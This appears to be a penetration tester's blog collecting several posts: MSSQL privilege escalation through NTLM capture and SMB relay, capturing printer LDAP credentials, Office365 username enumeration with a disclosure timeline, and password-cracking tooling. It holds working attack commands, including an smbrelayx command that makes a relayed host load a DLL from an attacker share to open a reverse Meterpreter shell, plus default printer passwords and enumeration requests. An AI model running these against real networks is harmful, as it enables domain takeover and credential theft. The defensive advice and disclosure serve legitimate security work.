MSSQL : You get admin! You get admin! EVERYONE GETS ADMIN!

TLDR: Domain Users permitted to authenticate to Microsoft SQL databases can use the limited privileges they are granted to run a stored procedure. The stored procedure can be used to send the database service credentials over the network. When the database service is configured with privileges, these can be cracked offline or relayed in order to escalate privileges. I have exploited this multiple times to escalate from domain user to domain administrator!

Finding MSSQL Server Instances

There are multiple methods to identify Microsoft SQL (MSSQL) Server Instances.

DNS

Including Domain Name Service (DNS) service records (SRV):

nslookup -type=SRV _sql._tcp.contoso.com

SPNs

Kerberos Service Principal Names (SPN):

ldapsearch -h dc1.contoso.com -b "DC=contoso,DC=com" -D "myuser@contoso.com" -W "servicePrincipalName=MSSQLSvc/*" "servicePrincipalName" | grep MSSQLSvc

Port Scanning

Or of course port scanning, however you should note that just scanning for the default ports (TCP 1433 and 2433) you will miss a lot of instances running on random ports. Instead you may wish to perform a UDP scan for port 1434 which presents the SQL Browser Service.

MSSQL Ping

This is my preferred method at the moment.

A number of utilities exist which can scan a network and interact with the MSSQL Browser Service in order to identify the TCP ports the MSSQL instances are running on.

However the tool I prefer is the metasploit auxiliary module mssql_ping, using the metasploit database.

msf > use auxiliary/scanner/mssql/mssql_ping

msf auxiliary(scanner/mssql/mssql_ping) > set rhosts 10.0.0.0/22
 rhosts => 10.0.0.0/22
 msf auxiliary(scanner/mssql/mssql_ping) > workspace -a test
 [*] Added workspace: test
 msf auxiliary(scanner/mssql/mssql_ping) > show options

Module options (auxiliary/scanner/mssql/mssql_ping):

Name Current Setting Required Description
 ---- --------------- -------- -----------
 PASSWORD no The password for the specified username
 RHOSTS 10.0.0.0/22 yes The target address range or CIDR identifier
 TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
 THREADS 1 yes The number of concurrent threads
 USERNAME sa no The username to authenticate as
 USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)

msf auxiliary(scanner/mssql/mssql_ping) > set threads 20
 threads => 20
 msf auxiliary(scanner/mssql/mssql_ping) > run
 [*] 10.0.3.7: - SQL Server information for 10.0.3.7:
 [+] 10.0.3.7: - ServerName = TESTDMZ
 [+] 10.0.3.7: - InstanceName = MSSQLSERVER
 [+] 10.0.3.7: - IsClustered = No
 [+] 10.0.3.7: - Version = 9.00.5000.00
 [+] 10.0.3.7: - tcp = 5693
 [*] Scanned 1024 of 1024 hosts (100% complete)
 [*] Auxiliary module execution completed

Login to MSSQL

There are multiple utilities to bruteforce MSSQL, however I use Metasploit’s mssql_login module. One thing to note when using this module with Windows authentication is that the domain parameter is required but not shown in the normal options output.

Since MSSQL server instances may be on inconsistent ports across hosts, I use a modified version of mssql_brute.rc – a Metasploit resource script.

msf auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/mssql/mssql_login
 msf auxiliary(scanner/mssql/mssql_login) > show options

Module options (auxiliary/scanner/mssql/mssql_login):

Name Current Setting Required Description
 ---- --------------- -------- -----------
 BLANK_PASSWORDS false no Try blank passwords for all users
 BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
 DB_ALL_CREDS false no Try each user/password couple stored in the current database
 DB_ALL_PASS false no Add all passwords in the current database to the list
 DB_ALL_USERS false no Add all users in the current database to the list
 PASSWORD no A specific password to authenticate with
 PASS_FILE no File containing passwords, one per line
 RHOSTS yes The target address range or CIDR identifier
 RPORT 5693 yes The target port (TCP)
 STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
 TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
 THREADS 1 yes The number of concurrent threads
 USERNAME no A specific username to authenticate as
 USERPASS_FILE no File containing users and passwords separated by space, one pair per line
 USER_AS_PASS false no Try the username as the password for all users
 USER_FILE no File containing usernames, one per line
 USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
 VERBOSE true yes Whether to print output for all attempts

msf auxiliary(scanner/mssql/mssql_login) > set domain CONTOSO
 domain => CONTOSO
msf auxiliary(scanner/mssql/mssql_login) > set use_windows_authent true
 use_windows_authent => true
 msf auxiliary(scanner/mssql/mssql_login) > set username MyUser
 username => MyUser
 msf auxiliary(scanner/mssql/mssql_login) > set password MyPassword
 password => MyPassword

msf auxiliary(scanner/mssql/mssql_login) > resource mssql_brute.rc [*] Processing /opt/metasploit-framework/embedded/framework/scripts/resource/mssql_brute.rc for ERB directives.
 [*] resource (/opt/metasploit-framework/embedded/framework/scripts/resource/mssql_domain_login.rc)> Ruby Code (1048 bytes)
 RHOSTS => 10.0.3.7
 RPORT => 5693
 BRUTEFORCE_SPEED => 5
 BLANK_PASSWORDS => false
 USER_AS_PASS => false
 [*] 10.0.3.7:5693 - 10.0.3.7:5693 - MSSQL - Starting authentication scanner.
 [-] 10.0.3.7:5693 - 10.0.3.7:5693 - LOGIN SUCCESS: CONTOSO\MyUser:MyPassword (Correct: )
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed

Executing Extended Stored Procedures

There are a number of useful extended stored procedures within MSSQL Server which can be useful to an attacker. Although some like xp_cmdshell require elevated permissions within the database, others such a xp_dirtree and xp_fileexists can be executed with the guest permissions often granted to the domain users group.

xp_dirtree and xp_fileexist

These two stored procedures can be invoked with a UNC path in order to cause the database service to connect to the attacker’s machine over SMB.

Privileges of the Database Service

Even though we have connected to the database using domain credentials, the stored procedure is executed under the context of the account the database service is running as.

The MSSQL service can be configured to run as the local system account (a terrible idea, as escalating privileges within the database also compromises the server), a local service account, a local account, a domain account, or as a domain managed service account.

The misconfiguration I regularly see is for the database service to be running as a domain account with significant privileges – local administrator within the server estate, or even domain administrator!

Exploitation

There are two methods of exploiting this series of misconfigurations.

Capturing the Hash

First you can simply capture the hash and subject this to an offline bruteforce attack. This relies on the account being configured with a significantly weak password.

Multiple tools can be used to perform this attack such as Responder, or the Metasploit SMB Capture module.

I am not going to go into detail in this area as it is extensively covered elsewhere (for example HollyGraceful’s post).

SMB Relay

As always there are various tools to accomplish this as this technique has been around a long time.

I use the smbrelayx.py from the impacket library to relay the authentication to a host with SMB signing disabled, and use rundll32 to load a malicious DLL from a network share which establishes a reverse meterpreter shell.

In order to do this, you need to have 2 IP addresses as both smbrelayx.py and the network share both require the same port. This can be accomplished with the following command, assuming eth0 is your network interface.

ifconfig eth0:0 10.0.0.2 netmask 255.255.255.0

We can then create and host the payload using the generic_dll_injection metasploit module by @_castleinthesky

msf auxiliary(scanner/mssql/mssql_login) > use exploit/windows/smb/generic_smb_dll_injection

msf exploit(windows/smb/generic_smb_dll_injection) > set file_name exploit.dll
 file_name => exploit.dll
 msf exploit(windows/smb/generic_smb_dll_injection) > set share share
 share => share
 msf exploit(windows/smb/generic_smb_dll_injection) > set srvhost 10.0.0.2 srvhost => 10.0.0.2
 msf exploit(windows/smb/generic_smb_dll_injection) > set payload windows/x64/meterpreter/reverse_https
 payload => windows/x64/meterpreter/reverse_https

msf exploit(windows/smb/generic_smb_dll_injection) > set lhost 10.0.0.2
 lhost => 10.0.0.2
 msf exploit(windows/smb/generic_smb_dll_injection) > run
 [*] Exploit running as background job 0.

With our payload ready we can run smbrelayx.py pointing to a host with smb signing disabled (by default, all Windows hosts except domain controllers)

sudo smbrelayx.py -h targethost -c 'rundll32 \\10.0.0.2\share\exploit.dll,1'

We can then use the xp_dirtree and xp_fileexist stored procedures, to do this I use the Metasploit module mssql_ntlm_stealer:

msf auxiliary(admin/mssql/mssql_ntlm_stealer) > set rport 5693
 rport => 5693
 msf auxiliary(admin/mssql/mssql_ntlm_stealer) > set rhosts 10.0.0.7
 rhosts => 10.0.0.7
 msf auxiliary(admin/mssql/mssql_ntlm_stealer) > set username myuser
username => myuser
 msf auxiliary(admin/mssql/mssql_ntlm_stealer) > set password MyPassword
 password => MyPassword
 msf auxiliary(admin/mssql/mssql_ntlm_stealer) > set domain CONTOSO
 domain => CONTOSO
 msf auxiliary(admin/mssql/mssql_ntlm_stealer) > set use_windows_authent true
 use_windows_authent => true
 msf auxiliary(admin/mssql/mssql_ntlm_stealer) > run

When the database service is running with administrative permissions, this can result in complete compromise of the domain.

Meterpreter Session 1 Opened

Defense

There are a series of insecure configurations at play here, I would recommend addressing them all to harden your environment. However most significantly, follow the principle of least privilege (1 and 2).

  1. Reconfigure the database to prevent authentication by all domain users. Ensure that only those who require access can authenticate to the database.
  2. Reconfigure the database service to run with minimum privileges, never as local system or an administrative account.
  3. Enable SMB signing, to prevent SMB Relay attacks.

It’s just a printer… What’s the worst that could happen?

As you would expect, office printers are often identified when conducting a penetration test of an office network. These devices often seem to be overlooked as there are usually more interesting and direct possibilities to pursue. However as organisations are becoming more security conscious and closing the wide open doors that have typically beckoned to me at the start of the assessment I have taken a renewed interest in these forgotten targets.

The type of printer I seem to see a lot on my engagements is Konica Minolta so that is what I am going to discuss. However I imagine many other makes can be exploited in a similar fashion.

Management Interface

Like a lot of systems, Konica Minolta printers have a Web management interface presented on port 80/443. A password is required in order to access the administrative settings, however unfortunately for a lot of organisations it has a default password that can be found with a quick Google search. There are a few variations depending on the model, but I usually find it is ‘1234567812345678’ or ‘12345678’.

A variety of options are available, however the one that has recently caught my attention is the LDAP connection settings.

A quick word about LDAP and AD

“The Lightweight Directory Access Protocol (LDAP) is a directory service protocol that runs on a layer above the TCP/IP stack. It provides a mechanism used to connect to, search, and modify Internet directories.” – https://msdn.microsoft.com/en-us/library/aa367008(v=vs.85).aspx

In a Windows domain environment you can use LDAP to interact with the Active Directory.

AD will allow a small amount of information to be disclosed with a ‘null bind’ (i.e. No username or password) however nothing like as much as the null sessions of old. In order to obtain a list of users a valid username and password must be used to bind to the server.

LDAP settings

On Konica Minolta printers it is possible to configure an LDAP server to connect to, along with credentials. In earlier versions of the firmware on these devices I have heard it is possible to recover the credentials simply by reading the html source of the page. Now, however the credentials are not returned in the interface so we have to work a little harder.

The list of LDAP Servers is under: Network > LDAP Setting > Setting Up LDAP

The interface allows the LDAP server to be modified without re-entering the credentials that will be used to connect. I presume this is for a simpler user experience, but it gives an opportunity for an attacker to escalate from master of a printer to a toe hold on the domain.

We can reconfigure the LDAP server address setting to a machine we control, and trigger a connection with the helpful “Test Connection” functionality.

Listening for the goods

netcat

If you have better luck than me, you may be able to get away with a simple netcat listener:

sudo nc -k -v -l -p 386

I am assured by @_castleinthesky that this works most of the time, however I have yet to be let off that easy.

Slapd

I have found that a full LDAP server is required as the printer first attempts a null bind and then queries the available information, only if these operations are successful does it proceed to bind with the credentials.

I searched for a simple ldap server that met the requirements, however there seemed to be limited options. In the end I opted to setup an open ldap server and use the slapd debug server service to accept connections and print out the messages from the printer. (If you know of an easier alternative, I would be happy to hear about it)

Installation

(Note this section is a lightly adapted version of the guide here https://www.server-world.info/en/note?os=Fedora_26&p=openldap )

From a root terminal:

Install OpenLDAP,

#> dnf install -y install openldap-servers openldap-clients

#> cp /usr/share/openldap-servers/DB_CONFIG.example /var/lib/ldap/DB_CONFIG 

#> chown ldap. /var/lib/ldap/DB_CONFIG

Set an OpenLDAP admin password (you will need this again shortly)

#> slappasswd 
New password:
Re-enter new password:
{SSHA}xxxxxxxxxxxxxxxxxxxxxxxx
#> vim chrootpw.ldif
# specify the password generated above for "olcRootPW" section
dn: olcDatabase={0}config,cn=config
changetype: modify
add: olcRootPW
olcRootPW: {SSHA}xxxxxxxxxxxxxxxxxxxxxxxx
#> ldapadd -Y EXTERNAL -H ldapi:/// -f chrootpw.ldif
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
modifying entry "olcDatabase={0}config,cn=config"

Import basic Schemas

#> ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/cosine.ldif 
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
adding new entry "cn=cosine,cn=schema,cn=config"

#> ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/nis.ldif 
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
adding new entry "cn=nis,cn=schema,cn=config"

#> ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/inetorgperson.ldif 
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
adding new entry "cn=inetorgperson,cn=schema,cn=config"

Set your domain name on LDAP DB.

# generate directory manager's password
#> slappasswd 
New password:
Re-enter new password:
{SSHA}xxxxxxxxxxxxxxxxxxxxxxxx

#> vim chdomain.ldif
# specify the password generated above for "olcRootPW" section
dn: olcDatabase={1}monitor,cn=config
changetype: modify
replace: olcAccess
olcAccess: {0}to * by dn.base="gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth"
read by dn.base="cn=Manager,dc=foo,dc=bar" read by * none

dn: olcDatabase={2}mdb,cn=config
changetype: modify
replace: olcSuffix
olcSuffix: dc=foo,dc=bar

dn: olcDatabase={2}mdb,cn=config
changetype: modify
replace: olcRootDN
olcRootDN: cn=Manager,dc=foo,dc=bar

dn: olcDatabase={2}mdb,cn=config
changetype: modify
add: olcRootPW
olcRootPW: {SSHA}xxxxxxxxxxxxxxxxxxxxxxxx

dn: olcDatabase={2}mdb,cn=config
changetype: modify
add: olcAccess
olcAccess: {0}to attrs=userPassword,shadowLastChange by
dn="cn=Manager,dc=foo,dc=bar" write by anonymous auth by self write by * none
olcAccess: {1}to dn.base="" by * read
olcAccess: {2}to * by dn="cn=Manager,dc=foo,dc=bar" write by * read

#> ldapmodify -Y EXTERNAL -H ldapi:/// -f chdomain.ldif 
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
modifying entry "olcDatabase={1}monitor,cn=config"

modifying entry "olcDatabase={2}mdb,cn=config"

modifying entry "olcDatabase={2}mdb,cn=config"

modifying entry "olcDatabase={2}mdb,cn=config"

modifying entry "olcDatabase={2}mdb,cn=config"

#> vim basedomain.ldif
dn: dc=foo,dc=bar
objectClass: top
objectClass: dcObject
objectclass: organization
o: Foo Bar
dc: DC1

dn: cn=Manager,dc=foo,dc=bar
objectClass: organizationalRole
cn: Manager
description: Directory Manager

dn: ou=People,dc=foo,dc=bar
objectClass: organizationalUnit
ou: People

dn: ou=Group,dc=foo,dc=bar
objectClass: organizationalUnit
ou: Group

#> ldapadd -x -D cn=Manager,dc=foo,dc=bar -W -f basedomain.ldif 
Enter LDAP Password: # directory manager's password
adding new entry "dc=foo,dc=bar"

adding new entry "cn=Manager,dc=foo,dc=bar"

adding new entry "ou=People,dc=foo,dc=bar"

adding new entry "ou=Group,dc=foo,dc=bar"

Configure LDAP TLS

Create and SSL Certificate
#> cd /etc/pki/tls/certs 
#> make server.key 
umask 77 ; \
/usr/bin/openssl genrsa -aes128 2048 > server.key
Generating RSA private key, 2048 bit long modulus
...
...
e is 65537 (0x10001)
Enter pass phrase: # set passphrase
Verifying - Enter pass phrase: # confirm

# remove passphrase from private key
#> openssl rsa -in server.key -out server.key 
Enter pass phrase for server.key: # input passphrase
writing RSA key

#> make server.csr 
umask 77 ; \
/usr/bin/openssl req -utf8 -new -key server.key -out server.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [XX]: # country
State or Province Name (full name) []: # state
Locality Name (eg, city) [Default City]: # city
Organization Name (eg, company) [Default Company Ltd]: # company
Organizational Unit Name (eg, section) []:Foo Bar # department
Common Name (eg, your name or your server's hostname) []:www.foo.bar # server's FQDN
Email Address []:xxx@foo.bar # admin email
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []: # Enter
An optional company name []: # Enter

#> openssl x509 -in server.csr -out server.crt -req -signkey server.key -days 3650
Signature ok
subject=/C=/ST=/L=/O=/OU=Foo Bar/CN=dlp.foo.bar/emailAddress=xxx@roo.bar
Getting Private key
Configure Slapd for SSL /TLS
#> cp /etc/pki/tls/certs/server.key \
/etc/pki/tls/certs/server.crt \
/etc/pki/tls/certs/ca-bundle.crt \
/etc/openldap/certs/

#> chown ldap. /etc/openldap/certs/server.key \
/etc/openldap/certs/server.crt \
/etc/openldap/certs/ca-bundle.crt

#> vim mod_ssl.ldif
# create new
 dn: cn=config
changetype: modify
add: olcTLSCACertificateFile
olcTLSCACertificateFile: /etc/openldap/certs/ca-bundle.crt
-
replace: olcTLSCertificateFile
olcTLSCertificateFile: /etc/openldap/certs/server.crt
-
replace: olcTLSCertificateKeyFile
olcTLSCertificateKeyFile: /etc/openldap/certs/server.key

#> ldapmodify -Y EXTERNAL -H ldapi:/// -f mod_ssl.ldif 
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
modifying entry "cn=config"

Allow LDAP through your local firewall

firewall-cmd --add-service={ldap,ldaps}

The payoff

Once you have installed and configured your LDAP service you can run it with the following command :

slapd -d 2

The screen shot below shows an example of the output when we run the connection test on the printer. As you can see the username and password are passed from the LDAP client to server.

slapd terminal output containing the username "MyUser" and password "MyPassword"

How bad can it be?

This very much depends on the credentials that have been configured.

If the principle of least privilege is being followed, then you may only get read access to certain elements of active directory. This is often still valuable as you can use that information to formulate further more accurate attacks.

Typically you are likely to get an account in the Domain Users group which may give access to sensitive information or form the prerequisite authentication for other attacks.

Or, like me, you may be rewarded for setting up an LDAP server and be handed a Domain Admin account on a silver platter.

Defence

This is not an issue with the device, it is doing exactly what it is supposed to do. You just need to configure it more securely 🙂

Defending against this issue should be relatively easy.

Change the default admin password to something long and complex, in line with your organisation’s password policy.

Do not use highly privileged accounts for a printer’s LDAP queries. Do use the principle of least privilege.

If possible restrict access to the administration interface to trusted hosts.

Office365 ActiveSync Username Enumeration

TLDR:

There is a simple username enumeration issue in Office365’s ActiveSync, Microsoft do not consider this a vulnerability so I don’t expect they will fix it, I have written a script to exploit this which is available here: https://bitbucket.org/grimhacker/office365userenum

What is ActiveSync?

Exchange ActiveSync in Microsoft Exchange Server lets Windows Mobile powered devices and other Exchange ActiveSync enabled devices to access Exchange mailbox data. Compatible mobile devices can access e-mail, calendar, contact, and task data in addition to documents stored on Windows SharePoint Services sites and Windows file shares. Information synchronized with the mobile devices is retained and can be accessed offline. [https://technet.microsoft.com/en-us/library/aa995986(v=exchg.65).aspx]

What is username enumeration?

Username enumeration is when an attacker can determine valid users in a system.

When the system reveals a username exists either due to misconfiguration or a design decision a username enumeration issue exists.

This is often identified in authentication interfaces, registration forms, and forgotten password functionality.

The information disclosed by the system can be used to determines a list of users which can then be used in further attacks such as a bruteforce – since the username is known to be correct, only the password needs to be guessed, greatly increasing the chances of successfully compromising an account.

The vulnerability

During the assessment of a 3rd party product which utilises ActiveSync, it was noted that the there was a clear response difference between a valid and invalid usernames submitted in the HTTP Basic Authentication Header.

Further investigation revealed that the issue was in fact in Office365 rather than the 3rd party product which was simply acting as a proxy. The domain for Office365’s ActiveSync service is trivial to identify if you have a mobile device configured to use Office365 for email (email app server settings): https://outlook.office365.com

In order to elicit a response from ActiveSync a number of parameters and headers are required, this is described in more detail here: http://mobilitydojo.net/2010/03/17/digging-into-the-exchange-activesync-protocol/

The username enumeration issue exists in the differing response to invalid vs valid usernames submitted in the Authorization header. This request header value consists of the username and password concatenated with a colon (:) separator and Base64 encoded.

The request below contains the following Base64 encoded credentials in the Authorization header: valid_user@contoso.com:Password1

OPTIONS /Microsoft-Server-ActiveSync HTTP/1.1
Host: outlook.office365.com
Connection: close
MS-ASProtocolVersion: 14.0
Content-Length: 0
Authorization: Basic dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE=

This elicits the following response (“401 Unauthorized”) indicating that the username is valid but the password is not:

HTTP/1.1 401 Unauthorized
Content-Length: 1293
Content-Type: text/html
Server: Microsoft-IIS/8.5
request-id: ab308ea5-9a01-4a1a-8d49-b91b3503e83f
X-CalculatedFETarget: LO1P123CU001.internal.outlook.com
X-BackEndHttpStatus: 401
WWW-Authenticate: Basic Realm="",Negotiate,Basic Realm=""
X-FEProxyInfo: LO1P123CA0018.GBRP123.PROD.OUTLOOK.COM
X-CalculatedBETarget: LO1P123MB0899.GBRP123.PROD.OUTLOOK.COM
X-BackEndHttpStatus: 401
X-DiagInfo: LO1P123MB0899
X-BEServer: LO1P123MB0899
X-FEServer: LO1P123CA0018
WWW-Authenticate: Basic Realm=""
X-Powered-By: ASP.NET
X-FEServer: VI1PR0101CA0050
Date: Wed, 14 Jun 2017 14:35:14 GMT
Connection: close
<snip>

The request below contains the following Base64 encoded credentials in the Authorization header: invalid_user@contoso.com:Password1

OPTIONS /Microsoft-Server-ActiveSync HTTP/1.1
Host: outlook.office365.com
Connection: close
MS-ASProtocolVersion: 14.0
Content-Length: 2
Authorization: Basic aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ==

This elicits the following response (“404 Not Found” and “X-CasErrorCode: UserNotFound”)indicating that the username is invalid:

HTTP/1.1 404 Not Found
Cache-Control: private
Server: Microsoft-IIS/8.5
request-id: 6fc1ee3a-ec99-4210-8a4c-12967a4639fc
X-CasErrorCode: UserNotFound
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: HE1PR05CA0220
Date: Wed, 28 Jun 2017 11:23:03 GMT
Connection: close
Content-Length: 0

By iterating through a list of potential usernames and observing the response, it is possible to enumerate a list of valid users which can then be targeted for further attacks. These attacks may be directly against the authentication, i.e attempting to guess the user’s password to compromise their account, or it may be as part of a social engineering attack e.g sending Phishing emails to known valid users.

It should be noted that this issues requires an authentication attempt and is therefore likely to appear in logs, and has a risk of locking out accounts. However it is also possible that a valid username and password combination will be identified, in which case the response is different depending on if 2FA is enabled or not.

If 2FA is enabled the response is (“403 Forbidden” with title “403 – Forbidden: Access is denied.”):

HTTP/1.1 403 Forbidden
Cache-Control: private
Content-Length: 1233
Content-Type: text/html
Server: Microsoft-IIS/8.5
request-id: 4095f6fa-5151-4699-9ea1-0ddf0cfab897
X-CalculatedBETarget: MM1P123MB0842.GBRP123.PROD.OUTLOOK.COM
X-BackEndHttpStatus: 403
Set-Cookie: <snip>
X-MS-Credentials-Expire: 4
X-MS-Credential-Service-Federated: false
X-MS-Credential-Service-Url: https://portal.microsoftonline.com/ChangePassword.aspx
X-MS-BackOffDuration: L/-480
X-AspNet-Version: 4.0.30319
X-DiagInfo: MM1P123MB0842
X-BEServer: MM1P123MB0842
X-Powered-By: ASP.NET
X-FEServer: DB6PR07CA0008
Date: Fri, 07 Jul 2017 13:11:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<--snip-->

If 2FA is NOT enabled the response is (“200 OK”):

HTTP/1.1 200 OK
Cache-Control: private
Allow: OPTIONS,POST
Content-Length: 0
Content-Type: application/vnd.ms-sync.wbxml
Server: Microsoft-IIS/8.5
request-id: da269652-6e98-4b49-8f14-ab57e7232b17
X-CalculatedFETarget: MMXP123CU001.internal.outlook.com
X-BackEndHttpStatus: 200
X-FEProxyInfo: MMXP123CA0005.GBRP123.PROD.OUTLOOK.COM
X-CalculatedBETarget: MMXP123MB0750.GBRP123.PROD.OUTLOOK.COM
X-BackEndHttpStatus: 200
MS-Server-ActiveSync: 15.1
MS-ASProtocolVersions: 2.0,2.1,2.5,12.0,12.1,14.0,14.1,16.0,16.1
MS-ASProtocolCommands: Sync,SendMail,SmartForward,SmartReply,GetAttachment,GetHierarchy,CreateCollection,DeleteCollection,MoveCollection,FolderSync,FolderCreate,FolderDelete,FolderUpdate,MoveItems,GetItemEstimate,MeetingResponse,Search,Settings,Ping,ItemOperations,Provision,ResolveRecipients,ValidateCert,Find
Public: OPTIONS,POST
X-MS-BackOffDuration: L/-470
X-AspNet-Version: 4.0.30319
X-DiagInfo: MMXP123MB0750
X-BEServer: MMXP123MB0750
X-FEServer: MMXP123CA0005
X-Powered-By: ASP.NET
X-FEServer: AM5P190CA0027
Date: Mon, 24 Jul 2017 09:50:22 GMT
Connection: close

It should be noted that only users with a valid mailbox are considered to be valid users in this context, therefore a domain account may exist which this enumeration would identify as invalid.

I also checked if this issue affected Microsoft Exchange, or if it was limited to Office365. In my testing I found that only Office365 was affected. I reported this issue to Microsoft, however they do not consider username enumeration to “meet the bar for security servicing”, so I do not expect they will fix this issue.

My continuing mission to replace myself with a small script

In order to automate exploitation of this issue I wrote a simple multi threaded python script. It is available here: https://bitbucket.org/grimhacker/office365userenum

When provided a list of potential usernames (username@domain) this script will attempt to authenticate to ActiveSync with the password ‘Password1’. Valid and invalid usernames are logged along with valid username and password combinations (in case you get lucky).

Disclose Timeline

28 June 2017, 13:30: Emailed secure@microsoft.com with a PGP encrypted PDF explaining issue with example HTTP  requests and responses.

28 June 2017, 22:39: Response from Microsoft (note only relevant section of email included below)

“Thank you for contacting the Microsoft Security Response Center (MSRC).  Upon investigation we have determined that these do not meet the bar for security servicing.  In general, username enumeration does not meet the bar as there are many ways to do this and on its own it does not allow an attacker access or control in any way, as the attacker would still need to bypass login.”

29 June 2017, 09:54: Emailed Microsoft stating intention to disclose in a blog post unless they had any serious objections.

24 July 2017: Details and tool disclosed to the public.

Although I do not agree with Microsoft’s determination that username enumeration is not a security vulnerability, I would like to thank them again for their speedy investigation and response to my report.

Loading Dirty JSON With Python

Recently I needed to parse some data embedded in HTML. At first glance it appeared to be JSON, so after pulling the text out of the HTML using BeautifulSoup, I tried to load it using the json module, however this immediately threw an error:

ValueError: Expecting property name enclosed in double quotes: line 1 column 2 (char 1)

This is because,  despite first appearances, the data I was trying  to extract was a python object built from strings, lists, integers, floats, and dictionaries which had been passed to the ‘print’ statement. But it was quite close to JSON so I decided that the best course of action in this instance was to ‘fix’ the data so that I could load it as JSON.

First, as the error above indicates, double quotes are required, not the single quotes mostly (but not always prefixed with a ‘u’  (indicating unicode) which my data had.

After removing these I encountered the error:

ValueError: No JSON object could be decoded

This thoroughly unhelpful error sent me scurrying to Google. Apparently this error is thrown in a variety of situations, but the one relevant to my data was the case of the boolean key words (True and False) in python they are capitalised, but in JSON they need to be lowercase. (This error is also thrown when there are trailing commas in lists).

I used regular expression substitution to implement these alterations. I decided to share these few lines of code for my future self and anyone else who may find it useful. (Note that this worked for my use case, but as soon as exceptions stopped being thrown I moved on. Therefore it may not be a robust or complete solution. You have been warned.)

import re
import json

def load_dirty_json(dirty_json):
    regex_replace = [(r"([ \{,:\[])(u)?'([^']+)'", r'\1"\3"'), (r" False([, \}\]])", r' false\1'), (r" True([, \}\]])", r' true\1')]
    for r, s in regex_replace:
        dirty_json = re.sub(r, s, dirty_json)
    clean_json = json.loads(dirty_json)
    return clean_json

Cracking LM Hashes with Ophcrack – No GUI

Believe it or not, despite the fact it is 2016 I am still finding LanManager (LM) hashes on internal networks during penetration tests.

Although in my experience it is becoming more frequent that LM hashing has been disabled, and the hashes I am finding are for accounts that have not had their password changed since that time and therefore still have the password stored in this weakly protected format.

The LM hash format is weak because the maximum password length it can support is 14, password is uppercased, split into two 7 character chunks and then hashed separately. (Note this is not really accurate, but it is sufficient for this post. See here for an accurate description of the LM ‘hashing’ scheme.)

If you find (or are informed) that you have LM password hash storage, you should prevent Windows from storing a LM hash and change all account passwords the number of times required by the password history account option to completely purge the previous LM hashes.

I often use John the Ripper to crack a wide variety of hashes, however the weaknesses in the LM hash format have allowed Rainbow Tables (aka Lookup Tables) to be created which allow rapid recovery of the plain text password. Ophcrack an industry favourite tool to crack LM hashes using rainbow tables, I prefer to use it without the GUI in order to decrease the amount of resources it requires – in fact I have recently started running it on a server I have built for password cracking which does not have a GUI environment so command line usage is a must.

Since I pretty much always use the same options for Ophcrack I have created a simple bash function to which I can pass the pwdump file containing the hashes I need to crack. It is not pretty, but I have decided to share it in the hope that it will be of some use to others and my future self.

ophcracklm () {
 log=$(echo $1.log)
 outfile=$(echo $1.cracked)
 session=$(echo $1.ophcracklm_session)
 (set -x; ophcrack -g -v -u -n 7 -l $log -o $outfile -S $session -d /path/to/ophcrack_tables/ -t xp_free:xp_special -f $1)
}

This bash function will create log, output file, and session file names based on the hash file name passed on the command line, enable debugging mode in a sub shell of bash, and run ophcrack with the following options:

-g disable GUI
-v verbose output
-u display statistics when cracking ends
-n number of threads (I have this set to 7 for my machine, you may need to change it to suit)
-l log all output to the file name created based on the input file name
-o output cracked hashes, in the pwdump format, to the file name created based on the input file name
-S save progress of the search to the file name created based on the input filename
-d base directory containing the tables
-t tables to use separated by colons
-f the file to load the hashes from (I am passing the second command argument, the first contains the script name, the second is the first parameter)

Note that I am using bash’s debug output in order to echo the command that will be executed, and I am doing this in a subshell because it is automatically reverted.


As always, if you have any questions, comments or suggestions please feel free to get in touch.

Installing a John the Ripper Cluster (Fedora 23/24)

John the Ripper is an excellent password cracking tool that I regularly use during penetration tests to recover plaintext passwords from multiple hash formats.

I recently started building a new dedicated rig with the sole purpose of cracking passwords. I didn’t have any money to invest in this project, so I am using whatever servers and workstations are lying around unused in the back of the server room. I therefore decided my best bet for maximum hash cracking goodness would be to use John in parallel across all these machines. This is a first for me so I thought I had better document how I did it for when it all burns to the ground and I have to start again. There are several guides online dictating how to achieve this kind of setup using Kali or Ubuntu, but I prefer Fedora so had to alter a lot of the commands to suit and I encountered some odd errors along the way.  I hope this (rambling) guide is useful to others as well as my future self.
